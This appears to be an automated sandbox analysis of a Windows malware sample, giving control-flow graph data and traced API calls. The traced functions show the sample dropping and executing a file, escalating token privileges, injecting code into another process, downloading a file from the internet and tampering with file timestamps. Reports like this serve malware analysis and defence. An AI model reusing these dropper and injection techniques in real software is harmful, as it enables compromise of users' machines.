7273->7274 7274->7282 7275 2b6e05e CreateFileA 7276 2b6e2b0 GetFileAttributesA 7275->7276 7275->7282 7277 2b6e2f7 CreateFileA 7276->7277 7276->7282 7277->7282 7278 2b6e100 ReadFile 7278->7282 7279 2b6e400 WriteFile SetFileTime FindCloseChangeNotification SetFileAttributesA CreateFileA 7280 2b6e47e WriteFile 7279->7280 7279->7282 7281 2b6e4af SetFileAttributesA 7280->7281 7281->7282 7282->7270 7282->7271 7282->7272 7282->7273 7282->7275 7282->7276 7282->7277 7282->7278 7282->7279 7283 2b6e20d GetFileAttributesA 7282->7283 7283->7282 7356 2bebb0b 7359 2bebb2d 7356->7359 7357 2bebbfb 7358 2bebe02 LoadLibraryA 7358->7359 7359->7357 7359->7358 7361 2bebe2b GetProcAddress 7359->7361 7362 2bebe47 VirtualProtect VirtualProtect 7359->7362 7361->7359 7364 2bebe41 ExitProcess 7361->7364 7363 2bebeac 7362->7363 7363->7363 7217 d63000 7219 d63044 GetPEB 7217->7219 7220 d63077 CreateFileA 7219->7220 7222 d63265 7220->7222 7223 d6322d 7220->7223 7224 d63246 WriteFile 7223->7224 7225 d63244 7223->7225 7226 d63255 FindCloseChangeNotification WinExec 7224->7226 7225->7226 7226->7222 7400 2b6fb41 7401 2b6fb59 7400->7401 7402 2b6fcc5 7401->7402 7405 2b6fb76 7401->7405 7403 2b6fcce RegCloseKey 7402->7403 7404 2b6fcdb 7402->7404 7403->7404 7406 2b6fbcf RegQueryValueExA 7405->7406 7407 2b6fc10 7405->7407 7406->7407 7325 2b6a92f 7326 2b6a93e 7325->7326 7330 2b67c71 MapViewOfFile 7326->7330 7342 2b6ad45 7326->7342 7327 2b6b724 FindCloseChangeNotification 7328 2b6b7d4 SetFileAttributesA 7327->7328 7329 2b6b73e SetFilePointer SetEndOfFile 7327->7329 7334 2b6b7f8 DeleteFileA 7328->7334 7337 2b6b802 7328->7337 7335 2b6b774 SetFileTime 7329->7335 7340 2b6ade3 7330->7340 7331 2b6b6dc GlobalAlloc 7336 2b6b53c 7331->7336 7334->7337 7335->7328 7336->7327 7338 2b6b84d Sleep 7337->7338 7339 2b6b858 7337->7339 7338->7339 7341 2b62745 2 API calls 7340->7341 7340->7342 7341->7342 7342->7327 7342->7331 7342->7336 7258 2b640ad 7261 2b6405b 7258->7261 7259 2b64291 Sleep 7259->7261 7260 2b642b8 7261->7259 7261->7260 7262 2b6c1ef 14 API calls 7261->7262 7263 2b6b888 7 API calls 7261->7263 7264 2b6be89 7 API calls 7261->7264 7262->7261 7263->7261 7264->7261 7293 2b6c3ca 7294 2b6c3d7 7293->7294 7295 2b6c556 7294->7295 7296 2b6b888 7 API calls 7294->7296 7297 2b6c53a 7296->7297 7297->7295 7298 2b6be89 7 API calls 7297->7298 7298->7295 7227 d507e8 7228 d508f7 CreateMutexA 7227->7228 7231 d507fc 7227->7231 7228->7231 7229 d5091a FindCloseChangeNotification Sleep 7229->7228 7230 d5092d 7231->7228 7231->7229 7231->7230 7265 2b6fb8b 7266 2b6fb9a 7265->7266 7267 2b6fbcf RegQueryValueExA 7266->7267 7268 2b6fc10 7266->7268 7267->7268 7408 2b6be4b 7409 2b6be55 Sleep 7408->7409 7411 2b6be78 7409->7411 7232 d697e8 7233 d698f7 CreateMutexA 7232->7233 7237 d697fc 7232->7237 7233->7237 7234 d6992d 7235 d69b95 7234->7235 7236 d69964 VirtualAlloc 7234->7236 7236->7235 7238 d699bf 7236->7238 7237->7233 7237->7234 7238->7235 7240 d69bc1 KiUserExceptionDispatcher 7238->7240 7241 d69bd4 7240->7241 7241->7238 7396 2b61f69 7397 2b61f78 7396->7397 7398 2b62399 4 API calls 7397->7398 7399 2b61fe5 7397->7399 7398->7399

                                Executed Functions

                                Function 02B69652 Relevance: 35.2, APIs: 13, Strings: 6, Instructions: 1977COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 2$M$$P$PE$d$d
                                • API String ID: 0-3739350137
                                • Opcode ID: 1e5895689fe20b0ab398a40cf996b4e98c83d48457c9256e4d543ae30d8914bc
                                • Instruction ID: 62470d2a5f7bfc6eeeb6d0fa0e592f169c7e213b4a76dc5353113a1f1fe8d217
                                • Opcode Fuzzy Hash: 1e5895689fe20b0ab398a40cf996b4e98c83d48457c9256e4d543ae30d8914bc
                                • Instruction Fuzzy Hash: 3B2317B5D01618DFDB24CF54CC94BE9B7B6FB88305F1881E9E10AAB280D735AA85CF54
                                Function 00D63044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171fileprocessCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 539 d63044-d63074 GetPEB 540 d63077-d6309a 539->540 541 d6309d-d630a0 540->541 542 d630a6-d630bc 541->542 543 d631ee-d6322b CreateFileA 541->543 544 d63110-d63116 542->544 545 d630be-d630c5 542->545 560 d63265-d63269 543->560 561 d6322d-d63230 543->561 547 d63118-d6311f 544->547 548 d63129-d6312f 544->548 545->544 549 d630c7-d630ce 545->549 547->548 550 d63121-d63124 547->550 551 d63131-d63138 548->551 552 d63148-d6314e 548->552 549->544 553 d630d0-d630d7 549->553 555 d631bb-d631c0 550->555 551->552 556 d6313a-d63141 551->556 557 d63167-d6316f 552->557 558 d63150-d63157 552->558 553->544 559 d630d9-d630dd 553->559 563 d631c2-d631c5 555->563 564 d631e0-d631e9 555->564 556->552 562 d63143-d63146 556->562 566 d63171-d63178 557->566 567 d63188-d6318e 557->567 558->557 565 d63159-d63160 558->565 559->544 568 d630df-d630e3 559->568 571 d63232-d63238 561->571 562->555 563->564 572 d631c7-d631ca 563->572 564->541 565->557 573 d63162-d63165 565->573 566->567 574 d6317a-d63181 566->574 569 d631a7-d631ad 567->569 570 d63190-d63197 567->570 568->555 575 d630e9-d6310b 568->575 569->555 578 d631af-d631b6 569->578 570->569 577 d63199-d631a0 570->577 579 d63246-d63252 WriteFile 571->579 580 d6323a-d63242 571->580 572->564 581 d631cc-d631cf 572->581 573->555 574->567 576 d63183-d63186 574->576 575->540 576->555 577->569 583 d631a2-d631a5 577->583 578->555 584 d631b8 578->584 586 d63255-d63262 FindCloseChangeNotification WinExec 579->586 580->571 585 d63244 580->585 581->564 587 d631d1-d631d4 581->587 583->555 584->555 585->586 586->560 587->564 588 d631d6-d631d9 587->588 588->564 589 d631db-d631de 588->589 589->543 589->564
                                APIs
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00D63223
                                • WriteFile.KERNEL32(00000000,FFFE75FF,00003E00,?,00000000), ref: 00D63252
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00D63256
                                • WinExec.KERNEL32(?,00000005), ref: 00D63262
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2264312389.0000000000D60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2264290428.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000C69000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265367690.0000000000D64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265367690.0000000000D68000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265442991.0000000000D69000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265442991.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2265490780.0000000000D79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                Similarity
                                • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$rksowY.exe
                                • API String ID: 2234911746-1163582672
                                • Opcode ID: 8f3ea90cbcb633ce9332640cb04b9dc4a5121c3cef332d4cc1253c7b04e2b282
                                • Instruction ID: 27a8bb7e22d2164f5506e8f79079f342a779db44aff727a9ac46c4d19378f2d5
                                • Opcode Fuzzy Hash: 8f3ea90cbcb633ce9332640cb04b9dc4a5121c3cef332d4cc1253c7b04e2b282
                                • Instruction Fuzzy Hash: 14611974D01215DBCF24CF94C884AADF7B0FF4A715F2982AAD446AB201C7799F81CBA5
                                Function 02B6CC92 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 382COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 660 2b6cc92-2b6cd90 call 2b73600 664 2b6cd96-2b6cd9f 660->664 665 2b6cf43-2b6cf5b 660->665 670 2b6cf37-2b6cf3e 664->670 671 2b6cda5-2b6cddc 664->671 668 2b6cf5d-2b6cf64 665->668 669 2b6cf69-2b6cf85 GetTokenInformation 665->669 672 2b6d247-2b6d24e 668->672 673 2b6cf87-2b6cf8e 669->673 674 2b6cf93-2b6cf9c 669->674 670->672 681 2b6cdde-2b6cde5 671->681 682 2b6cdea-2b6ce0e 671->682 675 2b6d267-2b6d26e 672->675 676 2b6d250-2b6d25d FindCloseChangeNotification 672->676 673->672 683 2b6cf9e-2b6cfa5 674->683 684 2b6cfaa-2b6cfcd 674->684 679 2b6d270-2b6d276 675->679 680 2b6d27d-2b6d284 675->680 676->675 679->680 685 2b6d286-2b6d295 680->685 686 2b6d29c-2b6d2af 680->686 681->672 691 2b6ce10-2b6ce1b 682->691 692 2b6ce4f-2b6ce9f LookupPrivilegeValueA AdjustTokenPrivileges 682->692 683->672 694 2b6cfcf-2b6cfd6 684->694 695 2b6cfdb-2b6d001 GetTokenInformation 684->695 685->686 703 2b6ce1d-2b6ce24 691->703 704 2b6ce29-2b6ce41 691->704 696 2b6cea1-2b6ceb5 692->696 697 2b6ceba-2b6cec5 692->697 694->672 699 2b6d003-2b6d00a 695->699 700 2b6d00f-2b6d055 695->700 696->672 706 2b6cec7-2b6cedb 697->706 707 2b6cee0-2b6cf27 AdjustTokenPrivileges FindCloseChangeNotification 697->707 699->672 708 2b6d057-2b6d05e 700->708 709 2b6d063-2b6d06c 700->709 703->672 704->692 720 2b6ce43-2b6ce4a 704->720 706->672 717 2b6cf35 707->717 718 2b6cf29-2b6cf30 707->718 708->672 711 2b6d06e-2b6d082 lstrcmpiA 709->711 712 2b6d0cc-2b6d0d3 709->712 715 2b6d084-2b6d098 711->715 716 2b6d0b0-2b6d0c5 CreateMutexA 711->716 712->672 715->716 722 2b6d09a-2b6d0ae 715->722 716->672 717->665 718->672 720->672 722->716 724 2b6d0ca-2b6d100 VirtualAllocEx 722->724 726 2b6d102-2b6d126 WriteProcessMemory 724->726 727 2b6d169-2b6d191 724->727 728 2b6d134-2b6d154 CreateRemoteThread 726->728 729 2b6d128-2b6d12f 726->729 733 2b6d197-2b6d1f1 call 2b72ceb * 2 727->733 734 2b6d22e-2b6d235 727->734 730 2b6d156-2b6d15d 728->730 731 2b6d162 728->731 729->672 730->672 731->727 741 2b6d1f3-2b6d1fa 733->741 742 2b6d1fc-2b6d21c 733->742 734->672 741->672 744 2b6d227 742->744 745 2b6d21e-2b6d225 742->745 744->734 745->672
                                APIs
                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 02B6D257
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: ChangeCloseFindNotification
                                • String ID: P
                                • API String ID: 2591292051-3110715001
                                • Opcode ID: 5bd34bad6d46300d01cf92a4bd4002ab2240cc2a9ade430f6608d4c591fcced3
                                • Instruction ID: e3a5360f04303c6b6a6bd605f351c51bc81d1805972e484e2745533f65906fd4
                                • Opcode Fuzzy Hash: 5bd34bad6d46300d01cf92a4bd4002ab2240cc2a9ade430f6608d4c591fcced3
                                • Instruction Fuzzy Hash: A4F14B71E40219EBEB24DBA4CC4CBE97774FB48754F104AD9E266AB1C0C7B89A84CF50
                                Function 02B6BADD Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 264sleepfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 876 2b6badd-2b6bb6a Sleep 877 2b6bb84-2b6bbb8 call 2b642c7 876->877 878 2b6bb6c-2b6bb81 876->878 884 2b6bbd6-2b6bc00 FindFirstFileA 877->884 885 2b6bbba-2b6bbd1 877->885 878->877 888 2b6bc06-2b6bc19 FindNextFileA 884->888 889 2b6be3c-2b6be5c 884->889 886 2b6be78-2b6be88 885->886 888->889 890 2b6bc1f-2b6bc29 888->890 894 2b6be5e-2b6be64 889->894 895 2b6be6b-2b6be76 Sleep 889->895 892 2b6bc2d-2b6bc36 890->892 893 2b6bc2b 890->893 896 2b6bc3d-2b6bc44 892->896 897 2b6bc38 892->897 893->888 894->895 895->886 898 2b6bc46-2b6bc66 896->898 899 2b6bc6d-2b6bc85 896->899 897->889 898->899 901 2b6bc87-2b6bc96 899->901 902 2b6bc9b-2b6bce2 899->902 901->888 907 2b6bd78-2b6bd8b 902->907 908 2b6bce8-2b6bcfe 902->908 909 2b6bd91-2b6bd9b 907->909 910 2b6be28-2b6be37 907->910 913 2b6bd17-2b6bd1e 908->913 914 2b6bd00-2b6bd15 908->914 909->910 912 2b6bda1-2b6bdf2 909->912 910->888 928 2b6bdf4-2b6be04 call 2b6badd 912->928 929 2b6be0c-2b6be25 912->929 915 2b6bd29-2b6bd38 913->915 914->907 914->913 917 2b6bd3a-2b6bd56 call 2b642c7 915->917 918 2b6bd68-2b6bd75 call 2b69652 915->918 926 2b6bd66 917->926 927 2b6bd58-2b6bd63 call 2b65719 917->927 918->907 926->915 927->926 934 2b6be09 928->934 929->910 934->929
                                APIs
                                • Sleep.KERNEL32(?,?,?,?,00000000,Function_00013630,02BE0240,000000FF,?,02B6CB1B,00000003,00000000,00000000,00000000), ref: 02B6BB57
                                • FindFirstFileA.KERNEL32(?,?), ref: 02B6BBED
                                • FindNextFileA.KERNELBASE(000000FF,?), ref: 02B6BC11
                                • Sleep.KERNEL32(00000400), ref: 02B6BE70
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: FileFindSleep$FirstNext
                                • String ID: c:\windows$d
                                • API String ID: 151579152-1584695526
                                • Opcode ID: 530d2877282de9edb3c16f3ab993db69166e58e67feb93742613cbe4ae85bfda
                                • Instruction ID: 24d7cbc265cd769eba603f272cb6ec53508d47dbfe92bb1efc6f55a88cba282a
                                • Opcode Fuzzy Hash: 530d2877282de9edb3c16f3ab993db69166e58e67feb93742613cbe4ae85bfda
                                • Instruction Fuzzy Hash: 45B15CB1A00209DBCF14DF68D898BAE77B5EF48349F148998F919EB241C738D951CF54
                                Function 02B6B888 Relevance: 10.6, APIs: 7, Instructions: 146networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 935 2b6b888-2b6b920 call 2b65b02 939 2b6b926-2b6b92d 935->939 940 2b6bad2-2b6badc 935->940 939->940 941 2b6b933-2b6b93a 939->941 941->940 942 2b6b940-2b6b947 941->942 942->940 943 2b6b94d-2b6b96e InternetOpenA 942->943 944 2b6baa6-2b6baad 943->944 945 2b6b974-2b6b9a0 InternetOpenUrlA 943->945 947 2b6baaf-2b6bab6 InternetCloseHandle 944->947 948 2b6babc-2b6bac3 944->948 945->944 946 2b6b9a6-2b6b9aa 945->946 949 2b6b9ce-2b6b9f0 InternetReadFile 946->949 950 2b6b9ac-2b6b9c8 CreateFileA 946->950 947->948 948->940 951 2b6bac5-2b6bacc InternetCloseHandle 948->951 952 2b6b9f6-2b6b9fd 949->952 953 2b6ba8c-2b6ba93 949->953 950->949 951->940 952->953 955 2b6ba03-2b6ba07 952->955 953->949 954 2b6ba99-2b6ba9f 953->954 954->944 956 2b6ba36-2b6ba3a 955->956 957 2b6ba09-2b6ba10 955->957 959 2b6ba3c-2b6ba45 956->959 960 2b6ba7a-2b6ba86 956->960 957->956 958 2b6ba12-2b6ba30 WriteFile 957->958 958->956 961 2b6ba47-2b6ba56 959->961 962 2b6ba58 959->962 960->953 961->962 963 2b6ba5a-2b6ba77 call 2b72ceb 961->963 962->954 963->960
                                APIs
                                • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02B6B95B
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 02B6B98D
                                • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 02B6B9C2
                                • InternetReadFile.WININET(00000000,00000000,00000400,00000000), ref: 02B6B9E8
                                • WriteFile.KERNEL32(000000FF,00000000,00000000,00000104,00000000), ref: 02B6BA30
                                • InternetCloseHandle.WININET(00000000), ref: 02B6BAB6
                                • InternetCloseHandle.WININET(00000000), ref: 02B6BACC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: Internet$File$CloseHandleOpen$CreateReadWrite
                                • String ID:
                                • API String ID: 4000607406-0
                                • Opcode ID: 25016f7ed928ba5e53e6f634da93bd9ac49e584d27d600ddbf666186d3cf679e
                                • Instruction ID: b696699c86f7c2b0c2f7f9027982f702d49ddc5a41e08d869b6d37c3ab41df55
                                • Opcode Fuzzy Hash: 25016f7ed928ba5e53e6f634da93bd9ac49e584d27d600ddbf666186d3cf679e
                                • Instruction Fuzzy Hash: 8B510871A4061CEBDB34CF58CC48BEAB775EB4430AF0485D8E259A6280DBB95BD8CF51
                                Function 02B61B0E Relevance: 7.9, APIs: 5, Instructions: 443registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1105 2b61b0e-2b61bbc call 2b73600 1108 2b61bc3-2b61c18 GetUserNameA call 2b72ceb 1105->1108 1109 2b61bbe 1105->1109 1115 2b61c2d-2b61c37 1108->1115 1116 2b61c1a-2b61c26 1108->1116 1110 2b622a3-2b622b3 1109->1110 1117 2b61c48-2b61c5b 1115->1117 1116->1115 1119 2b61ca3-2b61cfd RegOpenKeyExA 1117->1119 1120 2b61c5d-2b61ca1 1117->1120 1125 2b61d03-2b61d1e RegCreateKeyA 1119->1125 1126 2b61f5d-2b61f7f 1119->1126 1120->1117 1127 2b61d20-2b61d27 1125->1127 1128 2b61d2c-2b61d50 GlobalAlloc call 2b67c71 1125->1128 1130 2b61f85-2b61faf 1126->1130 1131 2b620ea-2b620f1 1126->1131 1127->1110 1140 2b61d66-2b61d6d 1128->1140 1141 2b61d52-2b61d5e call 2b62399 1128->1141 1143 2b61fb1-2b61fe3 1130->1143 1144 2b61fec-2b62025 1130->1144 1134 2b620f7-2b62252 call 2b72ceb * 5 call 2b62399 1131->1134 1135 2b62274-2b6227b 1131->1135 1208 2b62254-2b6226d call 2b72ceb 1134->1208 1209 2b6226f 1134->1209 1137 2b6227d-2b62283 1135->1137 1138 2b6228a-2b62291 1135->1138 1137->1138 1138->1110 1146 2b61d73-2b61d95 1140->1146 1147 2b61f3b-2b61f42 1140->1147 1149 2b61d63 1141->1149 1159 2b61fe5 1143->1159 1160 2b61fea 1143->1160 1161 2b62027 1144->1161 1162 2b6202c-2b6204e 1144->1162 1155 2b61ecf-2b61f38 call 2b72ceb * 2 1146->1155 1156 2b61d9b-2b61de0 1146->1156 1151 2b61f44-2b61f4b GlobalFree 1147->1151 1152 2b61f51-2b61f58 1147->1152 1149->1140 1151->1152 1152->1110 1155->1147 1177 2b61de6-2b61dec 1156->1177 1178 2b61e71-2b61e78 1156->1178 1160->1162 1161->1162 1163 2b62054-2b6205a 1162->1163 1164 2b620e5 1162->1164 1168 2b62061-2b6206d 1163->1168 1169 2b6206f-2b6207b 1163->1169 1170 2b6207d-2b62089 1163->1170 1171 2b6208b-2b62099 1163->1171 1172 2b6209b-2b620a7 1163->1172 1173 2b620c8-2b620e2 call 2b6169b 1163->1173 1174 2b620a9-2b620c6 call 2b6169b 1163->1174 1164->1131 1168->1164 1169->1164 1170->1164 1171->1164 1172->1164 1173->1164 1174->1164 1177->1168 1177->1169 1177->1170 1177->1171 1177->1172 1177->1173 1177->1174 1185 2b61e17-2b61e21 1177->1185 1186 2b61df3-2b61dfd 1177->1186 1187 2b61e51-2b61e6a call 2b616fd 1177->1187 1188 2b61dff-2b61e09 1177->1188 1189 2b61e23-2b61e2d 1177->1189 1190 2b61e2f-2b61e4f call 2b616fd 1177->1190 1191 2b61e0b-2b61e15 1177->1191 1183 2b61e9d-2b61ec3 1178->1183 1184 2b61e7a-2b61e9b 1178->1184 1205 2b61eca 1183->1205 1184->1205 1185->1178 1186->1178 1187->1178 1188->1178 1189->1178 1190->1178 1191->1178 1208->1135 1209->1135
                                APIs
                                • GetUserNameA.ADVAPI32(00000000,?), ref: 02B61BEA
                                • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02B61CF5
                                • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 02B61D16
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: CreateNameOpenUser
                                • String ID:
                                • API String ID: 3417583755-0
                                • Opcode ID: 6ddf8deee7a18f457f160b95f16d3b7ead8b5ae669deb4d4dc70b6671fe10c5c
                                • Instruction ID: 15c042773bb58c7f8d70e22f1bfa7acc98d16da5d5217ca4c80e0e86692ed428
                                • Opcode Fuzzy Hash: 6ddf8deee7a18f457f160b95f16d3b7ead8b5ae669deb4d4dc70b6671fe10c5c
                                • Instruction Fuzzy Hash: 42123B75D04A18DFDB24DF54CC88BEAB7B9BF84306F0486D9E50AAE280D7749A84CF51
                                Function 02BEBCD0 Relevance: 7.7, APIs: 5, Instructions: 207librarymemoryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1212 2bebcd0-2bebce0 1213 2bebcf2-2bebcf7 1212->1213 1214 2bebcf9 1213->1214 1215 2bebcfb 1214->1215 1216 2bebce8-2bebced 1214->1216 1218 2bebd00-2bebd02 1215->1218 1217 2bebcee-2bebcf0 1216->1217 1217->1213 1217->1214 1219 2bebd0b-2bebd0f 1218->1219 1220 2bebd04-2bebd09 1218->1220 1221 2bebd1c-2bebd1f 1219->1221 1222 2bebd11 1219->1222 1220->1219 1225 2bebd28-2bebd2a 1221->1225 1226 2bebd21-2bebd26 1221->1226 1223 2bebd3b-2bebd40 1222->1223 1224 2bebd13-2bebd1a 1222->1224 1227 2bebd42-2bebd4b 1223->1227 1228 2bebd53-2bebd55 1223->1228 1224->1221 1224->1223 1225->1218 1226->1225 1229 2bebd4d-2bebd51 1227->1229 1230 2bebdc2-2bebdc5 1227->1230 1231 2bebd5e 1228->1231 1232 2bebd57-2bebd5c 1228->1232 1229->1231 1233 2bebdca-2bebdcd 1230->1233 1234 2bebd2c-2bebd2e 1231->1234 1235 2bebd60-2bebd63 1231->1235 1232->1231 1238 2bebdcf-2bebdd1 1233->1238 1236 2bebd37-2bebd39 1234->1236 1237 2bebd30-2bebd35 1234->1237 1239 2bebd6c 1235->1239 1240 2bebd65-2bebd6a 1235->1240 1242 2bebd8d-2bebd9c 1236->1242 1237->1236 1238->1233 1243 2bebdd3-2bebdd6 1238->1243 1239->1234 1241 2bebd6e-2bebd70 1239->1241 1240->1239 1244 2bebd79-2bebd7d 1241->1244 1245 2bebd72-2bebd77 1241->1245 1246 2bebd9e-2bebda5 1242->1246 1247 2bebdac-2bebdb9 1242->1247 1243->1233 1248 2bebdd8-2bebdf4 1243->1248 1244->1241 1250 2bebd7f 1244->1250 1245->1244 1246->1246 1251 2bebda7 1246->1251 1247->1247 1252 2bebdbb-2bebdbd 1247->1252 1248->1238 1249 2bebdf6 1248->1249 1253 2bebdfc-2bebe00 1249->1253 1254 2bebd8a 1250->1254 1255 2bebd81-2bebd88 1250->1255 1251->1217 1252->1217 1256 2bebe47-2bebe4a 1253->1256 1257 2bebe02-2bebe18 LoadLibraryA 1253->1257 1254->1242 1255->1241 1255->1254 1259 2bebe4d-2bebe54 1256->1259 1258 2bebe19-2bebe1e 1257->1258 1258->1253 1260 2bebe20-2bebe22 1258->1260 1261 2bebe78-2bebea8 VirtualProtect * 2 1259->1261 1262 2bebe56-2bebe58 1259->1262 1263 2bebe2b-2bebe38 GetProcAddress 1260->1263 1264 2bebe24-2bebe2a 1260->1264 1267 2bebeac-2bebeb0 1261->1267 1265 2bebe5a-2bebe69 1262->1265 1266 2bebe6b-2bebe76 1262->1266 1269 2bebe3a-2bebe3f 1263->1269 1270 2bebe41 ExitProcess 1263->1270 1264->1263 1265->1259 1266->1265 1267->1267 1268 2bebeb2 1267->1268 1269->1258
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 02BEBE12
                                • GetProcAddress.KERNEL32(?,02BE8FF9), ref: 02BEBE30
                                • ExitProcess.KERNEL32(?,02BE8FF9), ref: 02BEBE41
                                • VirtualProtect.KERNEL32(02B60000,00001000,00000004,?,00000000), ref: 02BEBE8F
                                • VirtualProtect.KERNEL32(02B60000,00001000), ref: 02BEBEA4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                • String ID:
                                • API String ID: 1996367037-0
                                • Opcode ID: 4049932ffb759a96558e0a6d3fac7f5dc0b11330b65e6274c8e02ea1419c0ba3
                                • Instruction ID: b30ebdf15e03e413193b23b41245a3b46ea9b1c1681d58f73065bceb650542b4
                                • Opcode Fuzzy Hash: 4049932ffb759a96558e0a6d3fac7f5dc0b11330b65e6274c8e02ea1419c0ba3
                                • Instruction Fuzzy Hash: BB5105726446528BDF215AB8DCC07B8B7A4FB4122C7184BB8D6E7C73C6EBA45806C760
                                Function 02B63911 Relevance: 6.1, APIs: 4, Instructions: 122networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WS2_32(00000002,00000002,00000000), ref: 02B639F0
                                • setsockopt.WS2_32(?,0000FFFF,00001002,00100000,00000004), ref: 02B63A2E
                                • bind.WS2_32(?,00000002,00000010), ref: 02B63A44
                                Memory Dump Source
                                • Source File: 00000000.00000002.2266402880.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: true
                                • Associated: 00000000.00000002.2266402880.0000000002BE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2b60000_1.jbxd
                                Similarity
                                • API ID: bindsetsockoptsocket
                                • String ID:
